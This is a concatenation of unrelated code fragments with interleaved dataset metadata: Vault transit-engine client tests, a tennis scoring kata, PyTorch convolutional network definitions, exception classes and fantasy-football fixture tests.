signature_algorithm='pre-shared kitty cats',
raises=exceptions.ParamValidationError,
exception_message='invalid signature_algorithm argument provided',
),
])
def test_verify_signed_data(self, label, hash_input='hash this ish', hash_algorithm='sha2-256', signature_algorithm='pss',
raises=False, exception_message=''):
hash_input = utils.base64ify(hash_input)
key_name = 'testkey'
key_type = 'ed25519'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
key_type=key_type,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
sign_data_response = self.client.secrets.transit.sign_data(
name=key_name,
hash_input=hash_input,
hash_algorithm='sha2-256',
signature_algorithm='pss',
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('sign_data_response: %s' % sign_data_response)
signature = sign_data_response['data']['signature']
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.verify_signed_data(
name=key_name,
hash_input=hash_input,
signature=signature,
hash_algorithm=hash_algorithm,
signature_algorithm=signature_algorithm,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
verify_signed_data_response = self.client.secrets.transit.verify_signed_data(
name=key_name,
hash_input=hash_input,
signature=signature,
hash_algorithm=hash_algorithm,
signature_algorithm=signature_algorithm,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('verify_signed_data_response: %s' % verify_signed_data_response)
self.assertTrue(
expr=verify_signed_data_response['data']['valid'],
)
@parameterized.expand([
param(
'success',
),
param(
'allow_plaintext_backup false',
allow_plaintext_backup=False,
raises=exceptions.InternalServerError,
exception_message='plaintext backup is disallowed on the policy',
),
])
@skipIf(utils.vault_version_lt('0.9.1'), "transit key export/restore added in Vault versions >=0.9.1")
def test_backup_key(self, label, allow_plaintext_backup=True, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
update_key_configuration_response = self.client.secrets.transit.update_key_configuration(
name=key_name,
exportable=True,
allow_plaintext_backup=allow_plaintext_backup,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('update_key_configuration_response: %s' % update_key_configuration_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.backup_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
backup_key_response = self.client.secrets.transit.backup_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('backup_key_response: %s' % backup_key_response)
self.assertIn(
member='backup',
container=backup_key_response['data'],
)
@parameterized.expand([
param(
'success',
),
param(
'success with force',
force=True,
),
param(
'existing key without force',
name=None,
raises=exceptions.InternalServerError,
exception_message='already exists',
),
])
@skipIf(utils.vault_version_lt('0.9.1'), "transit key export/restore added in Vault versions >=0.9.1")
def test_restore_key(self, label, name='new_test_ky', force=False, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
update_key_configuration_response = self.client.secrets.transit.update_key_configuration(
name=key_name,
exportable=True,
allow_plaintext_backup=True,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('update_key_configuration_response: %s' % update_key_configuration_response)
backup_key_response = self.client.secrets.transit.backup_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('backup_key_response: %s' % backup_key_response)
backup = backup_key_response['data']['backup']
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.restore_key(
backup=backup,
name=name,
force=force,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
restore_key_response = self.client.secrets.transit.restore_key(
backup=backup,
name=name,
force=force,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('restore_key_response: %s' % restore_key_response)
self.assertEqual(
first=bool(restore_key_response),
second=True,
)
@parameterized.expand([
param(
'success',
),
])
@skipIf(utils.vault_version_lt('0.11.4'), "transit key trimming added in Vault versions >=0.11.4")
def test_trim_key(self, label, min_version=2, raises=False, exception_message=''):
key_name = 'testkey'
create_key_response = self.client.secrets.transit.create_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('create_key_response: %s' % create_key_response)
for _ in range(0, 10):
rotate_key_response = self.client.secrets.transit.rotate_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('rotate_key_response: %s' % rotate_key_response)
update_key_configuration_response = self.client.secrets.transit.update_key_configuration(
name=key_name,
min_decryption_version=3,
min_encryption_version=9,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('update_key_configuration_response: %s' % update_key_configuration_response)
read_key_response = self.client.secrets.transit.read_key(
name=key_name,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('read_key_response: %s' % read_key_response)
if raises:
with self.assertRaises(raises) as cm:
self.client.secrets.transit.trim_key(
name=key_name,
min_version=min_version,
mount_point=self.TEST_MOUNT_POINT,
)
self.assertIn(
member=exception_message,
container=str(cm.exception),
)
else:
trim_key_response = self.client.secrets.transit.trim_key(
name=key_name,
min_version=min_version,
mount_point=self.TEST_MOUNT_POINT,
)
logging.debug('trim_key_response: %s' % trim_key_response)
self.assertEqual(
first=bool(trim_key_response),
second=True,
)
| 37.493766
| 143
| 0.567542
| 2,948
| 30,070
| 5.486771
| 0.053935
| 0.079753
| 0.070974
| 0.071221
| 0.880618
| 0.852921
| 0.819907
| 0.809274
| 0.795363
| 0.790232
| 0
| 0.004624
| 0.345527
| 30,070
| 801
| 144
| 37.540574
| 0.817276
| 0
| 0
| 0.708387
| 0
| 0
| 0.089425
| 0.013535
| 0
| 0
| 0
| 0
| 0.070968
| 1
| 0.025806
| false
| 0
| 0.009032
| 0
| 0.037419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5829c25691dcb248087f1e30a4664677049bea2d
| 160
|
py
|
Python
|
backend/registry/tasks/__init__.py
|
Don-King-Kong/mrmap
|
f58a77bf979142876c38b98de0b7514c475b9905
|
[
"MIT"
] | 10
|
2021-03-12T17:46:38.000Z
|
2022-03-11T10:59:01.000Z
|
backend/registry/tasks/__init__.py
|
Don-King-Kong/mrmap
|
f58a77bf979142876c38b98de0b7514c475b9905
|
[
"MIT"
] | 214
|
2021-03-10T19:24:17.000Z
|
2022-03-15T07:34:24.000Z
|
backend/registry/tasks/__init__.py
|
Don-King-Kong/mrmap
|
f58a77bf979142876c38b98de0b7514c475b9905
|
[
"MIT"
] | 9
|
2021-03-16T19:47:54.000Z
|
2022-03-11T11:01:22.000Z
|
from .conformity import * # noqa
# TODO fix circular import
# from .harvest import * # noqa
from .monitoring import * # noqa
from .security import * # noqa
| 26.666667
| 33
| 0.7
| 20
| 160
| 5.6
| 0.5
| 0.357143
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2125
| 160
| 5
| 34
| 32
| 0.888889
| 0.43125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
58927d9624be2c9342b87b5bfd8087f06de09001
| 7,178
|
py
|
Python
|
python/tennis.py
|
Ananas97/Tennis-Refactoring-Kata
|
3e313f2e8cf6ee37b7c634e0d465bfd1139c46fb
|
[
"MIT"
] | null | null | null |
python/tennis.py
|
Ananas97/Tennis-Refactoring-Kata
|
3e313f2e8cf6ee37b7c634e0d465bfd1139c46fb
|
[
"MIT"
] | null | null | null |
python/tennis.py
|
Ananas97/Tennis-Refactoring-Kata
|
3e313f2e8cf6ee37b7c634e0d465bfd1139c46fb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class TennisGame1:
DRAW_SCORES = {
0: "Love-All",
1: "Fifteen-All",
2: "Thirty-All",
}
SCORES = {
0: "Love",
1: "Fifteen",
2: "Thirty",
3: "Forty",
}
def __init__(self, player_one_name, player_two_name):
self.player_one_name = player_one_name
self.player_two_name = player_two_name
self.player_one_points = 0
self.player_two_points = 0
def won_point(self, player_name):
if player_name == self.player_one_name:
self.player_one_points += 1
elif player_name == self.player_two_name:
self.player_two_points += 1
else:
raise Exception("Unknown player_name")
def score(self):
if self.player_one_points == self.player_two_points:
return self.get_draw()
elif self.player_one_points >= 4 or self.player_two_points >= 4:
points_difference = abs(self.player_one_points - self.player_two_points)
return self.get_message_by_difference(points_difference) + self.get_winning_player_name()
else:
result = self.get_player_score(self.player_one_points)
result += "-"
result += self.get_player_score(self.player_two_points)
return result
def get_draw(self):
return self.DRAW_SCORES.get(self.player_one_points, "Deuce")
def get_winning_player_name(self):
return self.player_one_name if self.player_one_points > self.player_two_points else self.player_two_name
def get_player_score(self, points):
return self.SCORES[points]
def get_message_by_difference(self, points_difference):
if points_difference == 1:
return "Advantage "
else:
return "Win for "
class TennisGame2:
def __init__(self, player_one_name, player_two_name):
self.player_one_name = player_one_name
self.player_two_name = player_two_name
self.player_one_points = 0
self.player_two_points = 0
def won_point(self, player_name):
if player_name == self.player_one_name:
self.add_score_for_player_one()
else:
self.add_score_for_player_two()
def score(self):
result = ""
if (self.player_one_points == self.player_two_points and self.player_one_points < 3):
if (self.player_one_points == 0):
result = "Love"
if (self.player_one_points == 1):
result = "Fifteen"
if (self.player_one_points == 2):
result = "Thirty"
result += "-All"
if (self.player_one_points == self.player_two_points and self.player_one_points > 2):
result = "Deuce"
player_one_result = ""
player_two_result = ""
if (self.player_one_points > 0 and self.player_two_points == 0):
if (self.player_one_points == 1):
player_one_result = "Fifteen"
if (self.player_one_points == 2):
player_one_result = "Thirty"
if (self.player_one_points == 3):
player_one_result = "Forty"
player_two_result = "Love"
result = player_one_result + "-" + player_two_result
if (self.player_two_points > 0 and self.player_one_points == 0):
if (self.player_two_points == 1):
player_two_result = "Fifteen"
if (self.player_two_points == 2):
player_two_result = "Thirty"
if (self.player_two_points == 3):
player_two_result = "Forty"
player_one_result = "Love"
result = player_one_result + "-" + player_two_result
if (self.player_one_points > self.player_two_points and self.player_one_points < 4):
if (self.player_one_points == 2):
player_one_result = "Thirty"
if (self.player_one_points == 3):
player_one_result = "Forty"
if (self.player_two_points == 1):
player_two_result = "Fifteen"
if (self.player_two_points == 2):
player_two_result = "Thirty"
result = player_one_result + "-" + player_two_result
if (self.player_two_points > self.player_one_points and self.player_two_points < 4):
if (self.player_two_points == 2):
player_two_result = "Thirty"
if (self.player_two_points == 3):
player_two_result = "Forty"
if (self.player_one_points == 1):
player_one_result = "Fifteen"
if (self.player_one_points == 2):
player_one_result = "Thirty"
result = player_one_result + "-" + player_two_result
if (self.player_one_points > self.player_two_points and self.player_two_points >= 3):
result = "Advantage " + self.player_one_name
if (self.player_two_points > self.player_one_points and self.player_one_points >= 3):
result = "Advantage " + self.player_two_name
if (self.player_one_points >= 4 and self.player_two_points >= 0 and (self.player_one_points - self.player_two_points) >= 2):
result = "Win for " + self.player_one_name
if (self.player_two_points >= 4 and self.player_one_points >= 0 and (self.player_two_points - self.player_one_points) >= 2):
result = "Win for " + self.player_two_name
return result
def set_player_one_score(self, number):
for i in range(number):
self.add_score_for_player_one()
def set_player_two_score(self, number):
for i in range(number):
self.add_score_for_player_two()
def add_score_for_player_one(self):
self.player_one_points += 1
def add_score_for_player_two(self):
self.player_two_points += 1
class TennisGame3:
def __init__(self, player_one_name, player_two_name):
self.player_one_name = player_one_name
self.player_two_name = player_two_name
self.player_one_points = 0
self.player_two_points = 0
def won_point(self, n):
if n == self.player_one_name:
self.player_one_points += 1
else:
self.player_two_points += 1
def score(self):
if (self.player_one_points < 4 and self.player_two_points < 4) \
and (self.player_one_points + self.player_two_points < 6):
p = ["Love", "Fifteen", "Thirty", "Forty"]
s = p[self.player_one_points]
return s + "-All" if (self.player_one_points == self.player_two_points) \
else s + "-" + p[self.player_two_points]
else:
if self.player_one_points == self.player_two_points:
return "Deuce"
s = self.player_one_name if self.player_one_points > self.player_two_points \
else self.player_two_name
return "Advantage " + s if ((self.player_one_points - self.player_two_points)
* (self.player_one_points - self.player_two_points) == 1) \
else "Win for " + s
| 38.8
| 132
| 0.604347
| 924
| 7,178
| 4.304113
| 0.064935
| 0.274076
| 0.192859
| 0.219764
| 0.821222
| 0.765401
| 0.721398
| 0.684184
| 0.655016
| 0.613025
| 0
| 0.012572
| 0.301895
| 7,178
| 184
| 133
| 39.01087
| 0.781082
| 0.002926
| 0
| 0.506494
| 0
| 0
| 0.042208
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11039
| false
| 0
| 0
| 0.019481
| 0.220779
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
543adf8bc24f5ee8a735a24b197b928c3d7e5276
| 3,015
|
py
|
Python
|
models/mnist_ERAN_convs.py
|
CAS-LRJ/DeepPAC
|
75059572c23474d32a762aca5640f4d799fd992a
|
[
"Apache-2.0"
] | null | null | null |
models/mnist_ERAN_convs.py
|
CAS-LRJ/DeepPAC
|
75059572c23474d32a762aca5640f4d799fd992a
|
[
"Apache-2.0"
] | null | null | null |
models/mnist_ERAN_convs.py
|
CAS-LRJ/DeepPAC
|
75059572c23474d32a762aca5640f4d799fd992a
|
[
"Apache-2.0"
] | null | null | null |
import torch.nn as nn
import torch
import numpy as np
class ConvSmallNetwork(nn.Module):
def __init__(self, activation=nn.ReLU):
super(ConvSmallNetwork, self).__init__()
self.activation=activation()
self.conv1=nn.Conv2d(1,16,4,2)
self.conv2=nn.Conv2d(16,32,4,2)
self.linear1=nn.Linear(5*5*32,100)
self.linear2=nn.Linear(100,10)
self.layers=[]
self.layers.append(self.conv1)
self.layers.append(self.conv2)
self.layers.append(self.linear1)
self.layers.append(self.linear2)
def load_pyt_file(self, file):
with open(file, 'r') as f:
for layer in self.layers:
str_in=f.readline()
while(str_in[0]!='['):
str_in=f.readline()
a_i=eval(str_in)
str_in=f.readline()
b_i=eval(str_in)
if isinstance(layer, nn.Conv2d):
a_i=np.array(a_i).transpose((3,2,0,1))
else:
a_i=np.array(a_i)
b_i=np.array(b_i)
layer.weight=nn.Parameter(torch.tensor(a_i, dtype=torch.float))
layer.bias=nn.Parameter(torch.tensor(b_i, dtype=torch.float))
def forward(self, x):
x=self.activation(self.layers[0](x))
x=self.activation(self.layers[1](x))
x=x.reshape(-1,5*5*32)
x=self.activation(self.layers[2](x))
x=self.layers[3](x)
return x
class ConvMedNetwork(nn.Module):
def __init__(self, activation=nn.ReLU):
super(ConvMedNetwork, self).__init__()
self.activation=activation()
self.conv1=nn.Conv2d(1,16,4,2,1)
self.conv2=nn.Conv2d(16,32,4,2,1)
self.linear1=nn.Linear(7*7*32,1000)
self.linear2=nn.Linear(1000,10)
self.layers=[]
self.layers.append(self.conv1)
self.layers.append(self.conv2)
self.layers.append(self.linear1)
self.layers.append(self.linear2)
def load_pyt_file(self, file):
with open(file, 'r') as f:
for layer in self.layers:
str_in=f.readline()
while(str_in[0]!='['):
str_in=f.readline()
a_i=eval(str_in)
str_in=f.readline()
b_i=eval(str_in)
if isinstance(layer, nn.Conv2d):
a_i=np.array(a_i).transpose((3,2,0,1))
else:
a_i=np.array(a_i)
b_i=np.array(b_i)
layer.weight=nn.Parameter(torch.tensor(a_i, dtype=torch.float))
layer.bias=nn.Parameter(torch.tensor(b_i, dtype=torch.float))
def forward(self, x):
x=self.activation(self.layers[0](x))
x=self.activation(self.layers[1](x))
x=x.reshape(-1,7*7*32)
x=self.activation(self.layers[2](x))
x=self.layers[3](x)
return x
| 36.325301
| 80
| 0.531675
| 417
| 3,015
| 3.719424
| 0.16307
| 0.128949
| 0.082527
| 0.103159
| 0.86009
| 0.86009
| 0.86009
| 0.86009
| 0.830432
| 0.778852
| 0
| 0.049505
| 0.330017
| 3,015
| 83
| 81
| 36.325301
| 0.718317
| 0
| 0
| 0.773333
| 0
| 0
| 0.001363
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.173333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54702047e1626775ef20eed9493f7b70d5d470f4
| 108
|
py
|
Python
|
ponyexpress/api/lib/helpers/__init__.py
|
TelekomCloud/pony-express
|
a825b518687719be5dfe95692008c2129db115cd
|
[
"Apache-2.0"
] | null | null | null |
ponyexpress/api/lib/helpers/__init__.py
|
TelekomCloud/pony-express
|
a825b518687719be5dfe95692008c2129db115cd
|
[
"Apache-2.0"
] | null | null | null |
ponyexpress/api/lib/helpers/__init__.py
|
TelekomCloud/pony-express
|
a825b518687719be5dfe95692008c2129db115cd
|
[
"Apache-2.0"
] | null | null | null |
from ponyexpress.api.lib.helpers.pagination import Pagination
from ponyexpress.api.lib.helpers.url import *
| 36
| 61
| 0.842593
| 15
| 108
| 6.066667
| 0.533333
| 0.32967
| 0.395604
| 0.461538
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 62
| 54
| 0.91
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
54b3b991758dc64b9c50a5d3a50c78dadac38bd8
| 1,263
|
py
|
Python
|
exceptions.py
|
benchambule/lottus
|
c239f33f98044327b5e8c4d3e62e2bf023c222ef
|
[
"MIT"
] | 1
|
2021-07-13T13:29:05.000Z
|
2021-07-13T13:29:05.000Z
|
exceptions.py
|
benchambule/lottus
|
c239f33f98044327b5e8c4d3e62e2bf023c222ef
|
[
"MIT"
] | 7
|
2019-05-18T20:05:23.000Z
|
2020-09-15T19:13:50.000Z
|
exceptions.py
|
benchambule/lottus
|
c239f33f98044327b5e8c4d3e62e2bf023c222ef
|
[
"MIT"
] | 3
|
2019-05-22T14:10:01.000Z
|
2020-08-11T15:22:59.000Z
|
class InvalidSelectedOptionError(Exception):
"""
"""
def __init__(self, expression, message):
"""
:param expression:
:param message:
"""
self.expression = expression
self.message = message
class SessionAlreadyFinishedError(Exception):
"""
"""
def __init__(self, expression, message):
"""
:param expression:
:param message:
"""
self.expression = expression
self.message = message
class WindowNotFoundError(Exception):
"""
"""
def __init__(self, expression, message):
"""
:param expression:
:param message:
"""
self.expression = expression
self.message = message
class ProcessorNotFoundError(Exception):
"""
"""
def __init__(self, expression, message):
"""
:param expression:
:param message:
"""
self.expression = expression
self.message = message
class ProcessorInvalidReturnError(Exception):
"""
"""
def __init__(self, expression, message):
"""
:param expression:
:param message:
"""
self.expression = expression
self.message = message
| 16.192308
| 45
| 0.551069
| 90
| 1,263
| 7.511111
| 0.144444
| 0.207101
| 0.118343
| 0.147929
| 0.813609
| 0.813609
| 0.813609
| 0.813609
| 0.813609
| 0.813609
| 0
| 0
| 0.338084
| 1,263
| 77
| 46
| 16.402597
| 0.808612
| 0.137767
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b71b2f3641256be40f2f160b00eb76e63ab644ac
| 107
|
py
|
Python
|
runpandas/io/fit/__init__.py
|
pnposch/runpandas
|
25388c18b52dfcc168e81922b8ba20ca93adad20
|
[
"MIT"
] | 11
|
2020-12-04T20:43:23.000Z
|
2022-03-16T19:19:12.000Z
|
runpandas/io/fit/__init__.py
|
pnposch/runpandas
|
25388c18b52dfcc168e81922b8ba20ca93adad20
|
[
"MIT"
] | 45
|
2020-06-23T02:50:31.000Z
|
2022-02-15T16:56:00.000Z
|
runpandas/io/fit/__init__.py
|
pnposch/runpandas
|
25388c18b52dfcc168e81922b8ba20ca93adad20
|
[
"MIT"
] | 4
|
2021-11-11T15:23:04.000Z
|
2022-02-02T13:02:12.000Z
|
from runpandas.io.fit._parser import read # noqa
from runpandas.io.fit._parser import gen_records # noqa
| 35.666667
| 56
| 0.794393
| 17
| 107
| 4.823529
| 0.588235
| 0.317073
| 0.365854
| 0.439024
| 0.731707
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130841
| 107
| 2
| 57
| 53.5
| 0.88172
| 0.084112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
b72f05836595befea6b6df67288adef56140e04a
| 15,763
|
py
|
Python
|
tests/test_fixture.py
|
njrahman/fpl
|
f213bcc1b361e1c0e20a1fcbba0cddbf64674b34
|
[
"MIT"
] | null | null | null |
tests/test_fixture.py
|
njrahman/fpl
|
f213bcc1b361e1c0e20a1fcbba0cddbf64674b34
|
[
"MIT"
] | null | null | null |
tests/test_fixture.py
|
njrahman/fpl
|
f213bcc1b361e1c0e20a1fcbba0cddbf64674b34
|
[
"MIT"
] | null | null | null |
from fpl.models.fixture import Fixture
fixture_data = {
"code": 1059760,
"event": 6,
"finished": True,
"finished_provisional": True,
"id": 59,
"kickoff_time": "2019-09-20T19:00:00Z",
"minutes": 90,
"provisional_start_time": False,
"started": True,
"team_a": 3,
"team_a_score": 3,
"team_h": 16,
"team_h_score": 1,
"stats": [
{
"identifier": "goals_scored",
"a": [
{
"value": 1,
"element": 59
},
{
"value": 1,
"element": 67
},
{
"value": 1,
"element": 505
}
],
"h": [
{
"value": 1,
"element": 321
}
]
},
{
"identifier": "assists",
"a": [
{
"value": 1,
"element": 65
},
{
"value": 1,
"element": 476
},
{
"value": 1,
"element": 494
}
],
"h": [
{
"value": 1,
"element": 437
}
]
},
{
"identifier": "own_goals",
"a": [
],
"h": [
]
},
{
"identifier": "penalties_saved",
"a": [
],
"h": [
]
},
{
"identifier": "penalties_missed",
"a": [
],
"h": [
]
},
{
"identifier": "yellow_cards",
"a": [
{
"value": 1,
"element": 82
},
{
"value": 1,
"element": 446
},
{
"value": 1,
"element": 505
}
],
"h": [
{
"value": 1,
"element": 328
}
]
},
{
"identifier": "red_cards",
"a": [
],
"h": [
]
},
{
"identifier": "saves",
"a": [
{
"value": 6,
"element": 494
}
],
"h": [
]
},
{
"identifier": "bonus",
"a": [
{
"value": 3,
"element": 494
},
{
"value": 1,
"element": 67
}
],
"h": [
{
"value": 2,
"element": 321
}
]
},
{
"identifier": "bps",
"a": [
{
"value": 34,
"element": 494
},
{
"value": 30,
"element": 67
},
{
"value": 26,
"element": 59
},
{
"value": 25,
"element": 65
},
{
"value": 23,
"element": 476
},
{
"value": 23,
"element": 505
},
{
"value": 14,
"element": 58
},
{
"value": 7,
"element": 82
},
{
"value": 6,
"element": 446
},
{
"value": 4,
"element": 79
},
{
"value": 3,
"element": 75
},
{
"value": 3,
"element": 80
},
{
"value": 2,
"element": 68
}
],
"h": [
{
"value": 31,
"element": 321
},
{
"value": 23,
"element": 328
},
{
"value": 17,
"element": 437
},
{
"value": 16,
"element": 486
},
{
"value": 14,
"element": 304
},
{
"value": 14,
"element": 508
},
{
"value": 13,
"element": 307
},
{
"value": 9,
"element": 320
},
{
"value": 9,
"element": 325
},
{
"value": 7,
"element": 319
},
{
"value": 6,
"element": 305
},
{
"value": 4,
"element": 313
},
{
"value": 3,
"element": 532
},
{
"value": 2,
"element": 323
}
]
}
],
"team_h_difficulty": 2,
"team_a_difficulty": 2
}
fixture_data_not_finished = {
"code": 1059760,
"event": 6,
"finished": False,
"finished_provisional": False,
"id": 59,
"kickoff_time": "2019-09-20T19:00:00Z",
"minutes": 90,
"provisional_start_time": False,
"started": True,
"team_a": 3,
"team_a_score": 3,
"team_h": 16,
"team_h_score": 1,
"stats": [
{
"identifier": "goals_scored",
"a": [
{
"value": 1,
"element": 59
},
{
"value": 1,
"element": 67
},
{
"value": 1,
"element": 505
}
],
"h": [
{
"value": 1,
"element": 321
}
]
},
{
"identifier": "assists",
"a": [
{
"value": 1,
"element": 65
},
{
"value": 1,
"element": 476
},
{
"value": 1,
"element": 494
}
],
"h": [
{
"value": 1,
"element": 437
}
]
},
{
"identifier": "own_goals",
"a": [
],
"h": [
]
},
{
"identifier": "penalties_saved",
"a": [
],
"h": [
]
},
{
"identifier": "penalties_missed",
"a": [
],
"h": [
]
},
{
"identifier": "yellow_cards",
"a": [
{
"value": 1,
"element": 82
},
{
"value": 1,
"element": 446
},
{
"value": 1,
"element": 505
}
],
"h": [
{
"value": 1,
"element": 328
}
]
},
{
"identifier": "red_cards",
"a": [
],
"h": [
]
},
{
"identifier": "saves",
"a": [
{
"value": 6,
"element": 494
}
],
"h": [
]
},
{
"identifier": "bonus",
"a": [],
"h": []
},
{
"identifier": "bps",
"a": [
{
"value": 34,
"element": 494
},
{
"value": 30,
"element": 67
},
{
"value": 26,
"element": 59
},
{
"value": 25,
"element": 65
},
{
"value": 23,
"element": 476
},
{
"value": 23,
"element": 505
},
{
"value": 14,
"element": 58
},
{
"value": 7,
"element": 82
},
{
"value": 6,
"element": 446
},
{
"value": 4,
"element": 79
},
{
"value": 3,
"element": 75
},
{
"value": 3,
"element": 80
},
{
"value": 2,
"element": 68
}
],
"h": [
{
"value": 31,
"element": 321
},
{
"value": 23,
"element": 328
},
{
"value": 17,
"element": 437
},
{
"value": 16,
"element": 486
},
{
"value": 14,
"element": 304
},
{
"value": 14,
"element": 508
},
{
"value": 13,
"element": 307
},
{
"value": 9,
"element": 320
},
{
"value": 9,
"element": 325
},
{
"value": 7,
"element": 319
},
{
"value": 6,
"element": 305
},
{
"value": 4,
"element": 313
},
{
"value": 3,
"element": 532
},
{
"value": 2,
"element": 323
}
]
}
],
"team_h_difficulty": 2,
"team_a_difficulty": 2
}
class TestFixture(object):
@staticmethod
def test_init():
fixture = Fixture(fixture_data)
for k, v in fixture_data.items():
if k != 'stats':
assert getattr(fixture, k) == v
@staticmethod
def _do_test_not_finished(fixture, method):
fixture.finished = False
fixture.stats['bonus']['a'] = []
fixture.stats['bonus']['h'] = []
data_dict = getattr(fixture, method)()
assert isinstance(data_dict, dict)
assert len(data_dict) == 2
@staticmethod
def _do_test_finished(fixture, method):
data_dict = getattr(fixture, method)()
assert isinstance(data_dict, dict)
assert tuple(data_dict.keys()) == ('a', 'h')
assert isinstance(data_dict['a'], list)
assert isinstance(data_dict['h'], list)
assert all([isinstance(d, dict) for d in data_dict['a']])
assert all([isinstance(d, dict) for d in data_dict['h']])
assert all([tuple(d.keys()) == ('value', 'element') for d in data_dict['a']])
assert all([tuple(d.keys()) == ('value', 'element') for d in data_dict['h']])
assert all([all([isinstance(v, int) for v in d.values()]) for d in data_dict['a']])
assert all([all([isinstance(v, int) for v in d.values()]) for d in data_dict['h']])
def test_get_goalscorers_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_goalscorers")
def test_get_goalscorers_finished(self, fixture):
self._do_test_finished(fixture, "get_goalscorers")
def test_get_assisters_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_assisters")
def test_get_assisters_finished(self, fixture):
self._do_test_finished(fixture, "get_assisters")
def test_get_own_goalscorers_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_own_goalscorers")
def test_get_own_goalscorers_finished(self, fixture):
self._do_test_finished(fixture, "get_own_goalscorers")
def test_get_yellow_cards_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_yellow_cards")
def test_get_yellow_cards(self, fixture):
self._do_test_finished(fixture, "get_yellow_cards")
def test_get_red_cards_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_red_cards")
def test_get_red_cards_finished(self, fixture):
self._do_test_finished(fixture, "get_red_cards")
def test_get_penalty_saves_not_finished(self, fixture):
self._do_test_not_finished(fixture, "get_penalty_saves")
